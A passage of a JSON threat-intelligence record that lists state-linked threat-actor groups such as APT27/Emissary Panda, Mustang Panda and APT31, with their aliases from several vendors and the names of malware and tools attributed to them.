"MISPGALAXY:APT27", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "b399b5f1-42d3-4b53-8c73-d448fce6ab43", "created_at": "2025-08-07T02:03:24.68371Z", "updated_at": "2026-04-10T02:00:03.64323Z", "deleted_at": null, "main_name": "BRONZE UNION", "aliases": [ "APT27 ", "Bowser", "Budworm ", "Circle Typhoon ", "Emissary Panda ", "Group35", "Iron Tiger ", "Linen Typhoon ", "Lucky Mouse ", "TG-3390 ", "Temp.Hippo " ], "source_name": "Secureworks:BRONZE UNION", "tools": [ "AbcShell", "China Chopper", "EAGERBEE", "Gh0st RAT", "OwaAuth", "PhantomNet", "PoisonIvy", "Sysupdate", "Wonknu", "Wrapikatz", "ZxShell", "reGeorg" ], "source_id": "Secureworks", "reports": null }, { "id": "9baa7519-772a-4862-b412-6f0463691b89", "created_at": "2022-10-25T15:50:23.354429Z", "updated_at": "2026-04-10T02:00:05.310361Z", "deleted_at": null, "main_name": "Mustang Panda", "aliases": [ "Mustang Panda", "TA416", "RedDelta", "BRONZE PRESIDENT", "STATELY TAURUS", "FIREANT", "CAMARO DRAGON", "EARTH PRETA", "HIVE0154", "TWILL TYPHOON", "TANTALUM", "LUMINOUS MOTH", "UNC6384", "TEMP.Hex", "Red Lich" ], "source_name": "MITRE:Mustang Panda", "tools": [ "CANONSTAGER", "STATICPLUGIN", "ShadowPad", "TONESHELL", "Cobalt Strike", "HIUPAN", "Impacket", "SplatCloak", "PAKLOG", "Wevtutil", "AdFind", "CLAIMLOADER", "Mimikatz", "PUBLOAD", "StarProxy", "CorKLOG", "RCSession", "NBTscan", "PoisonIvy", "SplatDropper", "China Chopper", "PlugX" ], "source_id": "MITRE", "reports": null }, { "id": "74d9dada-0106-414a-8bb9-b0d527db7756", "created_at": "2025-08-07T02:03:24.69718Z", "updated_at": "2026-04-10T02:00:03.733346Z", "deleted_at": null, "main_name": "BRONZE VINEWOOD", "aliases": [ "APT31 ", "BRONZE EXPRESS ", "Judgment Panda ", "Red Keres", "TA412", "VINEWOOD ", "Violet Typhoon ", "ZIRCONIUM " ], "source_name": "Secureworks:BRONZE VINEWOOD", "tools": [ "DropboxAES RAT", "HanaLoader", "Metasploit", "Mimikatz", "Reverse ICMP shell", "Trochilus" ], "source_id": "Secureworks", "reports": null }, { "id": "5c13338b-eaed-429a-9437-f5015aa98276", "created_at": "2022-10-25T16:07:23.582715Z", "updated_at": "2026-04-10T02:00:04.675765Z", "deleted_at": null, "main_name": "Emissary Panda", "aliases": [ "APT 27", "ATK 15", "Bronze Union", "Budworm", "Circle Typhoon", "Earth Smilodon", "Emissary Panda", "G0027", "Group 35", "Iron Taurus", "Iron Tiger", "Linen Typhoon", "LuckyMouse", "Operation DRBControl", "Operation Iron Tiger", "Operation PZChao", "Operation SpoiledLegacy", "Operation StealthyTrident", "Red Phoenix", "TEMP.Hippo", "TG-3390", "ZipToken" ], "source_name": "ETDA:Emissary Panda", "tools": [ "ASPXSpy", "ASPXTool", "Agent.dhwf", "AngryRebel", "Antak", "CHINACHOPPER", "China Chopper", "Destroy RAT", "DestroyRAT", "FOCUSFJORD", "Farfli", "Gh0st RAT", "Ghost RAT", "HTTPBrowser", "HTran", "HUC Packet Transmit Tool", "HighShell", "HttpBrowser RAT", "HttpDump", "HyperBro", "HyperSSL", "HyperShell", "Kaba", "Korplug", "LOLBAS", "LOLBins", "Living off the Land", "Mimikatz", "Moudour", "Mydoor", "Nishang", "OwaAuth", "PCRat", "PlugX", "ProcDump", "PsExec", "RedDelta", "SEASHARPEE", "Sensocode", "SinoChopper", "Sogu", "SysUpdate", "TIGERPLUG", "TVT", "Thoper", "Token Control", "TokenControl", "TwoFace", "WCE", "Windows Credential Editor", "Windows Credentials Editor", "Xamtrav", "ZXShell", "gsecdump", "luckyowa" ], "source_id": "ETDA", "reports": null }, { "id": "2ee03999-5432-4a65-a850-c543b4fefc3d", "created_at": "2022-10-25T16:07:23.882813Z", "updated_at": "2026-04-10T02:00:04.776949Z", "deleted_at": null, "main_name": "Mustang Panda", "aliases": [ "Bronze President", "Camaro Dragon", "Earth Preta", "G0129", "Hive0154", "HoneyMyte", "Mustang Panda", "Operation SMUGX", "Operation SmugX", "PKPLUG", "Red Lich", "Stately Taurus", "TEMP.Hex", "Twill Typhoon" ], "source_name": "ETDA:Mustang Panda", "tools": [ "9002 RAT", "AdFind", "Agent.dhwf", "Agentemis", "CHINACHOPPER", "China Chopper", "Chymine", "ClaimLoader", "Cobalt Strike", "CobaltStrike", "DCSync", "DOPLUGS", "Darkmoon", "Destroy RAT", "DestroyRAT", "Farseer", "Gen:Trojan.Heur.PT", "HOMEUNIX", "Hdump", "HenBox", "HidraQ", "Hodur", "Homux", "HopperTick", "Hydraq", "Impacket", "Kaba", "Korplug", "LadonGo", "MQsTTang", "McRAT", "MdmBot", "Mimikatz", "NBTscan", "NetSess", "Netview", "Orat", "POISONPLUG.SHADOW", "PUBLOAD", "PVE Find AD Users", "PlugX", "Poison Ivy", "PowerView", "QMAGENT", "RCSession", "RedDelta", "Roarur", "SPIVY", "ShadowPad Winnti", "SinoChopper", "Sogu", "TIGERPLUG", "TONEINS", "TONESHELL", "TVT", "TeamViewer", "Thoper", "TinyNote", "WispRider", "WmiExec", "XShellGhost", "Xamtrav", "Zupdax", "cobeacon", "nbtscan", "nmap", "pivy", "poisonivy" ], "source_id": "ETDA", "reports": null }, { "id": "236429ce-6355-43f6-9b58-e6803a1df3f4", "created_at": "2026-03-16T02:02:50.60344Z", "updated_at": "2026-04-10T02:00:03.641587Z", "deleted_at": null, "main_name": "Bronze Union", "aliases": [ "Circle Typhoon ", "Emissary Panda " ], "source_name": "Secureworks:Bronze Union", "tools": [ "China Chopper", "OwaAuth", "Sysupdate" ], "source_id": "Secureworks", "reports": null } ], "ts_created_at": 1775434424, "ts_updated_at": 1775826749, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/9139a34107ab4cc3e506b55f7d2f2557f68b7e3e.pdf", "text": "https://archive.orkl.eu/9139a34107ab4cc3e506b55f7d2f2557f68b7e3e.txt", "img": "https://archive.orkl.eu/9139a34107ab4cc3e506b55f7d2f2557f68b7e3e.jpg" } }